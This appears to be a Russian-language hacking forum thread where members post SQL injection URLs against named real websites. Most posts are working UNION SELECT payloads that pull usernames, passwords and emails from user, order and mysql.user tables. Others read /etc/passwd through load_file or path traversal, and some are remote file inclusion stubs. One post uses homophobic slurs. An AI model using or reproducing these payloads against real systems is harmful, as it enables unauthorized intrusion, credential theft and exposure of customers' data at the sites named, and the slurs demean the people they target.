SQL Инъекции

Постим здесь скуль инъекции! Флейм/оффтоп будет жестоко удаляться + будет испорчена репа.
Перед тем как запостить инъекцию, проверьте не выкладывалась ли она ранее:

========> АНТИБОЯН <========​

Вбиваем site:forum.antichat.ru "СЮДА СВОЮ СКУЛЬ" и жмём эту кнопочку. Всё просто!!!​

Попробуй, тебе понравится!!!​

--------------------------------------------------------------------------------------------------------------​

Правила этой темы:

1.

Что бы избежать дальнейших накруток и притензий, ограничтесь при выставление репутации в этой теме её колличеством от 1 до 3.
При оценивание постов в этой теме, старайтесь сделать это как можно более рационально - не стоит ставить +3 за не полностью раскрученную инъекцию.


Многие инъекции, которые вы выкладываете, "не доведены до ума", иногда кажется, что это всё выкладывается только, что бы запостить пост и показать, что ты умеешь делать sql инъекции, в результате получается большая активность. Только толку от неё нету, пробуйте не просто подбирать кол-во колонок, выводить инфу о БД, но и подбирать таблицы и имена колонок.

2.

Инъекции вида:

Code:

http://site.ru/index.php?a='

будут удаляться.

3.

По причине участившихся дефейсов принято решение не публиковать в теме пароли и хеши к админкам

Они будут удаляться, а нарушители наказываться

 

Как увидел тему, сразу захотелось стать ПервоНахом. Думал, где искать скули и на ум почему-то пришли только они - ПИДОРЫ. гыггыг
Итог: http://www.gaycentral.ru/news/?id=30'
Правда дальше не копался.
Думаю, что будет удобно новичкам, так как виден полный текст запроса.
Дальше, снизу было написано Made by KAMOV Media (gayly.ru)
После чего было найдено http://www.gayly.ru/news/archive/?year=2'005&month=12 аналогично.
АнтиПидорсОфАнтичат.
P.S. Монстер, с тебя простава мне, как первонаху.... гыгыгыгг

 

_http://csmania.ru/modules.php?name=Articles&pa=showarticle&articles_id=8'
Улыбнуло -)

 

ht~tp://www.patrickharviemsp.com/index.php?page=news.php&story=49%20union%20select%201,2,3,4,5/*

 

TV-CLUB.RU(его рекламу по Ren-TV крутят)


_http://tv-club.ru/catalog.php?id=-7+union+select+name+from+users+where+id=user_id/*

_http://tv-club.ru/catalog.php?id=-7+union+select+password+from+users+where+id=user_id/*

_http://tv-club.ru/catalog.php?id=-7+union+select+email+from+users+where+id=user_id/*

 

_http://www.mediaprovinces.kz/index.php?r=8c=174'9

 

_http://ganjubass.com/info.php?id=999999999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/* (вобще сайт сам одна большая скуль)

_http://www.lion.kz/show_news.php?id=872%27

 

_http://livestats.micromir.com/view.php?order=ip&pg=5'

 

http://cs-maps.org/index.php?page=maplist.php&type=dm&source=N&sort=date'&pageno=1
мои пять копеек

 

_http://www.fitness.ru/clubs/timetable.phtml?ClubID=17'

 

_http://www.zapaxa.net/?act=detail&id=23'3

_http://www.elabuga.ru/virt1.phtml?rait=7&cat=1'3

_http://www.fitness.ru/clubs/timetable.phtml?ClubID=1'7

_http://www.0577.ru/imode/south/?winers=33'

 

_http://parnas.baltika.ru/forum/?rand=35191&fold_id=14&forumid=1'

 

_http://gsmfilm.ru/page.php?page=-102+union+select+111,222,333/*

 

_http://avtostarter.com/obzor.php?page=1'

 

Для тех, кому не по душе клубик ЦСКА.

Code:

http://www.peski.ru/gbook/find/index.php?nik=88&pr1=%3E%3D&d1=16&m1=07&y1=2006&pr2=%3C%3D&d2=23&m2=07&y2=2006&invis=1&mess=88'/*&mail=88&ipf=88&sort=0

Правда не получилось даже кол-во столбцов подобрать - до 30и пробовал примерно и заипался. Там еще где-то скуль-инж была, но не помню где уже.

 

Code:

http://www.swadba.by/include.php?dir=http://
http://www.4webhelp.net/tutorials/?cid=9%20union%20select%20user_password,2,3,4,5,6%20from%20users/*-
http://www.driftscenter.dk/page.php?emne_id=3%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7/*-
http://www.ipworld.only.pl/portal/articles.php?topic=-18%20union%20select%20111,pass,333,444,555%20from%20users%20where%20nick=admin%2527/*-
http://www.gamersinfo.net/content/news.php?id=-168%20union%20select%20111,username,password,email,555,666,777,888,999%20from%20user%20limit%201000/*-
http://www.dailynews-tsn.com/news.php?id=2163'%20union%20select%201,2,3,4,5,6,7,8,9,load_file('/home2/tsnweb/dailynews-tsn-www/db_fns.php'),1,2,3,4,5,6,7,8,9%20from%20tsn_members/*-
http://www.dynamomania.com/news.php?p=message&id=-20242%20union%20select%201,2,email,pwd,5,6%20from%20users%20limit%203,4/*
http://www.nhia.edu/news.php?id=13%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5/*-
http://www.foodheart.org/news/news.php?id=55555555555%20union%20select%201,username,3,password,5,6,7,8,9%20from%20users/*-
http://staging.aiap.it/news.php?ID=-754%20union%20select%201,2,load_file('/etc/passwd'),4,5,6,7,8/*-
http://webpagemaintenance.com/article.php?id=444444444444444%20union%20select%20111,222%20from%20affiliates/*-
http://www.nasar.org/nasar/news.php?id=6666666666666%20union%20select%201,2,email,password%20from%20users/*-
http://www.greenshift.com/news.php?id=5555555555%20union%20select%201,2,user,4,password,6,7,8,9,0,1,2%20from%20mysql.user%20limit%203,4/*
http://www.jerusalemfoundation.org/news.php?id=-143%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5/*
http://www.hispanicprwire.com/news.php?l=in&id=-640%20union%20select%201,2,3,4,5,6/*
http://www.bendruomenes.lt/news.php?id=9999999999%20union%20select%201,2,username,4,5,password,7,8,9,0%20from%20users%20limit%2010,15/*
http://www.dadcomehome.org/en/news.php?id=9999999999%20union%20select%201,2,3,4,Password,6,7,8,9,0,1,2,3,4%20from%20mysql.user/*
http://www.thestra.com/news.php?type=article&id=93%20union%20select%200,0,password,0,0%20from%20mysql.user/*
http://www.losingtoday.com/news.php?id=-1475%20union%20select%201,2,3,4,5,6,7,8,9,0%20from%20users/*
http://www.agh.edu.pl/news.php?id=-389%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5/*
http://www.reusablebags.com/news.php?id=-17%20union%20select%201,email,3,4,5,6,7,8,9%20from%20orders/*
http://www.statistica.md/news.php?lang=ru&id=12666666666%20union%20select%201,2,3,4,5,6,7,8,9,0,1/*
http://kmi4schools.e2bn.net/rostra/news.php?r=1&t=2&id=555555555%20union%20select%201,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,0,1,2,3%20from%20account/*
http://fat-cat.co.uk/fatcat/news.php?id=44444444444%20union%20select%201,user,password,4,5,6,7,8,9,0,1,2%20from%20mysql.user/*
http://insolution.at/news.php?id=../../../../../etc/passwd
http://www.pixelvalley.com/news/news.php?id=874%20union%20select%20password,2,3%20from%20mysql.user/*
http://www.dslvalley.com/news/news.php?id=874%20union%20select%20password,2,3%20from%20mysql.user/*
http://smartphone.to.pl/news.php?id=55555555%20union%20select%201,parol,3,4,5,6,7%20from%20user/*
http://www.depot.com.ar/chat/web/admin/extentions.php
http://www.evergreencc.com/calendar/payment.php?insPath=http://

 

Вот красивый сайтик, но....

Code:

_http://bknt.ru/library/?cat=2609\'/*иid=1916

З.Ы.: Кому не лень почитайте статейку без \'/* - познавательно! =)

 

Я на шел вот странички
cvs.php.net/viewcvs.cgi/php-master-web/users.sql
wiki.cs.cityu.edu.hk/src/users.sql
Можно ли, что-нибудь с ними сделать

 

_http://www.dreamtech.ru/Kino/CardView.phtml?id=-1 union select 1,2,3,4/*

 

_http://www.sibdosug.com/details.php?id=310'
Я там так и не смог подобрать число столбцов(((
А по идеи весь этот сайт полная sql-inj